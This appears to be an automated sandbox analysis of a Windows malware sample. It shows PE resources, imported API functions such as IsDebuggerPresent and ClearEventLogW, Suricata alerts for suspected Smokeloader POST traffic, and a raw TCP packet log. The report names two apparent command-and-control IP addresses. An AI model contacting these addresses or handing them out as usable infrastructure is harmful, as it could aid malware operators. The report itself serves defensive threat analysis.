RT_STRING	0x273a2a8	0x84c	data			0.4129001883239171
RT_STRING	0x273aaf8	0x666	data			0.4340659340659341
RT_STRING	0x273b160	0x7f6	data			0.4210009813542689
RT_STRING	0x273b958	0x758	data			0.41914893617021276
RT_STRING	0x273c0b0	0x78c	data			0.4254658385093168
RT_STRING	0x273c840	0x666	data			0.4340659340659341
RT_STRING	0x273cea8	0x69e	data			0.4268004722550177
RT_STRING	0x273d548	0x54c	data			0.44026548672566373
RT_STRING	0x273da98	0x26	data			0.5526315789473685
RT_GROUP_ICON	0x272d920	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x27383c8	0x76	data	Turkish	Turkey	0.6779661016949152
RT_GROUP_ICON	0x2728190	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2731ba0	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2738440	0x1b4	data			0.5848623853211009

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasExesLengthA, DeleteVolumeMountPointA, OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, SearchPathW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize

ADVAPI32.dll

ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-12T22:28:34.855747+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	190.147.128.172	80	TCP
2024-10-12T22:28:36.179777+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	190.147.128.172	80	TCP
2024-10-12T22:28:37.301512+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	190.147.128.172	80	TCP
2024-10-12T22:28:38.679060+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	190.147.128.172	80	TCP
2024-10-12T22:28:39.768855+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	190.147.128.172	80	TCP
2024-10-12T22:28:40.836305+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	190.147.128.172	80	TCP
2024-10-12T22:28:42.152277+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	190.147.128.172	80	TCP
2024-10-12T22:28:43.239304+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	190.147.128.172	80	TCP
2024-10-12T22:28:44.333751+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	190.147.128.172	80	TCP
2024-10-12T22:28:45.434201+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	190.147.128.172	80	TCP
2024-10-12T22:28:46.545952+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	190.147.128.172	80	TCP
2024-10-12T22:28:47.805965+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	190.147.128.172	80	TCP
2024-10-12T22:28:48.888009+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	190.147.128.172	80	TCP
2024-10-12T22:28:49.963152+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	190.147.128.172	80	TCP
2024-10-12T22:28:51.038576+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	190.147.128.172	80	TCP
2024-10-12T22:28:52.162158+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	190.147.128.172	80	TCP
2024-10-12T22:28:53.210807+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	190.147.128.172	80	TCP
2024-10-12T22:28:54.287233+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	190.147.128.172	80	TCP
2024-10-12T22:28:55.393275+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	190.147.128.172	80	TCP
2024-10-12T22:28:56.468350+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49757	190.147.128.172	80	TCP
2024-10-12T22:28:57.586832+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	190.147.128.172	80	TCP
2024-10-12T22:28:58.647677+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	190.147.128.172	80	TCP
2024-10-12T22:28:59.810217+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49767	190.147.128.172	80	TCP
2024-10-12T22:29:00.890699+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49773	190.147.128.172	80	TCP
2024-10-12T22:29:03.439980+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49790	190.147.128.172	80	TCP
2024-10-12T22:29:04.556178+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49796	190.147.128.172	80	TCP
2024-10-12T22:29:06.138823+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49802	190.147.128.172	80	TCP
2024-10-12T22:29:07.242035+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49808	190.147.128.172	80	TCP
2024-10-12T22:29:08.323623+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49819	190.147.128.172	80	TCP
2024-10-12T22:29:09.405245+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49825	190.147.128.172	80	TCP
2024-10-12T22:29:10.496935+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49832	190.147.128.172	80	TCP
2024-10-12T22:29:11.577113+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49841	190.147.128.172	80	TCP
2024-10-12T22:29:12.665671+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49847	190.147.128.172	80	TCP
2024-10-12T22:29:13.773014+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49853	190.147.128.172	80	TCP
2024-10-12T22:29:15.061716+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49859	190.147.128.172	80	TCP
2024-10-12T22:29:16.143581+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49870	190.147.128.172	80	TCP
2024-10-12T22:30:26.260553+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50043	190.147.128.172	80	TCP
2024-10-12T22:30:33.005730+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50044	190.147.128.172	80	TCP
2024-10-12T22:30:42.007630+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50045	190.147.128.172	80	TCP
2024-10-12T22:30:52.824767+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50046	190.147.128.172	80	TCP
2024-10-12T22:31:06.258519+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50047	175.119.10.231	80	TCP
2024-10-12T22:31:20.968526+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50048	175.119.10.231	80	TCP
2024-10-12T22:31:36.114550+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50049	175.119.10.231	80	TCP
2024-10-12T22:31:50.445964+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50050	175.119.10.231	80	TCP
2024-10-12T22:32:05.414626+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50051	175.119.10.231	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 22:28:33.770670891 CEST	49738	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:33.775965929 CEST	80	49738	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:33.779050112 CEST	49738	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:33.779191971 CEST	49738	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:33.779207945 CEST	49738	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:33.784885883 CEST	80	49738	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:33.784929991 CEST	80	49738	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:34.853705883 CEST	80	49738	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:34.855674028 CEST	80	49738	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:34.855746984 CEST	49738	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:34.858443022 CEST	49738	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:34.863708019 CEST	80	49738	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:34.865556002 CEST	49739	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:34.871479034 CEST	80	49739	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:34.871782064 CEST	49739	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:34.871783018 CEST	49739	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:34.872253895 CEST	49739	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:34.878262043 CEST	80	49739	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:34.878304958 CEST	80	49739	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:36.179528952 CEST	80	49739	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:36.179589987 CEST	80	49739	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:36.179776907 CEST	49739	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:36.187469006 CEST	49739	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:36.193149090 CEST	80	49739	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:36.195935965 CEST	49740	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:36.201766014 CEST	80	49740	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:36.201921940 CEST	49740	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:36.202023029 CEST	49740	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:36.202045918 CEST	49740	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:36.207376957 CEST	80	49740	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:36.207436085 CEST	80	49740	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:37.289573908 CEST	80	49740	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:37.299576998 CEST	80	49740	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:37.301512003 CEST	49740	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:37.310858965 CEST	49740	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:37.316076994 CEST	80	49740	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:37.414208889 CEST	49741	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:37.419828892 CEST	80	49741	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:37.421583891 CEST	49741	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:37.424860954 CEST	49741	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:37.424860954 CEST	49741	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:37.430412054 CEST	80	49741	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:37.430454969 CEST	80	49741	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:38.672749996 CEST	80	49741	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:38.678963900 CEST	80	49741	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:38.679059982 CEST	49741	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:38.679151058 CEST	49741	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:38.681971073 CEST	49742	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:38.684175014 CEST	80	49741	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:38.686997890 CEST	80	49742	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:38.687088966 CEST	49742	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:38.687381029 CEST	49742	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:38.687443972 CEST	49742	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:38.692604065 CEST	80	49742	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:38.692692995 CEST	80	49742	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:39.768317938 CEST	80	49742	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:39.768364906 CEST	80	49742	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:39.768855095 CEST	49742	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:39.768949032 CEST	49742	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:39.771872997 CEST	49743	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:39.774502039 CEST	80	49742	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:39.777617931 CEST	80	49743	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:39.777806044 CEST	49743	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:39.777894974 CEST	49743	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:39.777895927 CEST	49743	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:39.783144951 CEST	80	49743	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:39.783581018 CEST	80	49743	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:40.835685968 CEST	80	49743	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:40.836146116 CEST	80	49743	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:40.836304903 CEST	49743	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:40.838768959 CEST	49743	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:40.844115973 CEST	80	49743	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:41.079164982 CEST	49744	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:41.084857941 CEST	80	49744	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:41.085087061 CEST	49744	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:41.085225105 CEST	49744	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:41.085225105 CEST	49744	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:41.090698957 CEST	80	49744	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:41.090740919 CEST	80	49744	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:42.151626110 CEST	80	49744	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:42.152110100 CEST	80	49744	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:42.152276993 CEST	49744	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:42.152277946 CEST	49744	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:42.156593084 CEST	49745	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:42.158034086 CEST	80	49744	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:42.162166119 CEST	80	49745	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:42.162252903 CEST	49745	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:42.162394047 CEST	49745	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:42.162415981 CEST	49745	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:42.167875051 CEST	80	49745	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:42.167963982 CEST	80	49745	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:43.233310938 CEST	80	49745	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:43.239176035 CEST	80	49745	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:43.239304066 CEST	49745	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:43.239417076 CEST	49745	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:43.241761923 CEST	49746	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:43.244939089 CEST	80	49745	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:43.247461081 CEST	80	49746	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:43.247555971 CEST	49746	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:43.247734070 CEST	49746	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:43.247759104 CEST	49746	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:43.253447056 CEST	80	49746	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:43.253489017 CEST	80	49746	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:44.333525896 CEST	80	49746	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:44.333573103 CEST	80	49746	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:44.333750963 CEST	49746	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:44.333848000 CEST	49746	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:44.337908983 CEST	49747	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:44.339143991 CEST	80	49746	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:44.343411922 CEST	80	49747	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:44.343616962 CEST	49747	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:44.343616962 CEST	49747	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:44.343703032 CEST	49747	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:44.349200964 CEST	80	49747	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:44.349242926 CEST	80	49747	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:45.426671982 CEST	80	49747	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:45.434111118 CEST	80	49747	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:45.434201002 CEST	49747	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:45.434283018 CEST	49747	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:45.437298059 CEST	49748	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:45.441237926 CEST	80	49747	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:45.445086002 CEST	80	49748	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:45.445662022 CEST	49748	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:45.445760965 CEST	49748	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:45.445760965 CEST	49748	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:45.455094099 CEST	80	49748	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:45.455600023 CEST	80	49748	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:46.545255899 CEST	80	49748	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:46.545748949 CEST	80	49748	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:46.545952082 CEST	49748	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:46.546099901 CEST	49748	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:46.548844099 CEST	49749	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:46.551568985 CEST	80	49748	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:46.554313898 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:46.554399967 CEST	49749	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:46.554502964 CEST	49749	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:46.554517031 CEST	49749	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:46.559757948 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:46.560254097 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.805634022 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.805665970 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.805692911 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.805964947 CEST	49749	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:47.806013107 CEST	49749	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:47.809058905 CEST	49750	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:47.811342955 CEST	80	49749	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.814418077 CEST	80	49750	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.814587116 CEST	49750	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:47.814610004 CEST	49750	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:47.814631939 CEST	49750	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:47.819936991 CEST	80	49750	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:47.820000887 CEST	80	49750	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:48.887799025 CEST	80	49750	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:48.887852907 CEST	80	49750	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:48.888009071 CEST	49750	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:48.888355970 CEST	49750	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:48.891052008 CEST	49751	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:48.893260956 CEST	80	49750	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:48.895977974 CEST	80	49751	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:48.896080017 CEST	49751	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:48.896249056 CEST	49751	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:48.896281004 CEST	49751	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:48.901341915 CEST	80	49751	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:48.901372910 CEST	80	49751	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:49.962893009 CEST	80	49751	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:49.962938070 CEST	80	49751	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:49.963151932 CEST	49751	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:49.963242054 CEST	49751	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:49.966161013 CEST	49752	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:49.968807936 CEST	80	49751	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:49.971616983 CEST	80	49752	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:49.971728086 CEST	49752	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:49.971869946 CEST	49752	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:49.971894026 CEST	49752	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:49.977370977 CEST	80	49752	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:49.977413893 CEST	80	49752	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:51.038444996 CEST	80	49752	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:51.038501978 CEST	80	49752	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:51.038575888 CEST	49752	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:51.038806915 CEST	49752	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:51.041127920 CEST	49753	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:51.043999910 CEST	80	49752	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:51.046570063 CEST	80	49753	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:51.046684027 CEST	49753	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:51.046792984 CEST	49753	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:51.046792984 CEST	49753	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:51.052293062 CEST	80	49753	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:51.052330017 CEST	80	49753	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:52.156235933 CEST	80	49753	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:52.161973000 CEST	80	49753	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:52.162158012 CEST	49753	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:52.162158966 CEST	49753	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:52.164845943 CEST	49754	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:52.167463064 CEST	80	49753	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:52.170300961 CEST	80	49754	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:52.170399904 CEST	49754	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:52.170543909 CEST	49754	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:52.170579910 CEST	49754	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:52.175702095 CEST	80	49754	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:52.175743103 CEST	80	49754	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:53.208653927 CEST	80	49754	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:53.210635900 CEST	80	49754	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:53.210807085 CEST	49754	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:53.210807085 CEST	49754	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:53.213532925 CEST	49755	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:53.216123104 CEST	80	49754	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:53.218782902 CEST	80	49755	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:53.218873978 CEST	49755	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:53.219034910 CEST	49755	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:53.219077110 CEST	49755	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:53.224292994 CEST	80	49755	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:53.224337101 CEST	80	49755	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:54.279781103 CEST	80	49755	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:54.286978006 CEST	80	49755	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:54.287233114 CEST	49755	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:54.287331104 CEST	49755	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:54.289580107 CEST	49756	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:54.292366982 CEST	80	49755	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:54.294853926 CEST	80	49756	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:54.295131922 CEST	49756	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:54.295329094 CEST	49756	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:54.295380116 CEST	49756	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:28:54.300625086 CEST	80	49756	190.147.128.172	192.168.2.4
Oct 12, 2024 22:28:54.300667048 CEST	80	49756	190.147.128.172	192.168.2.4
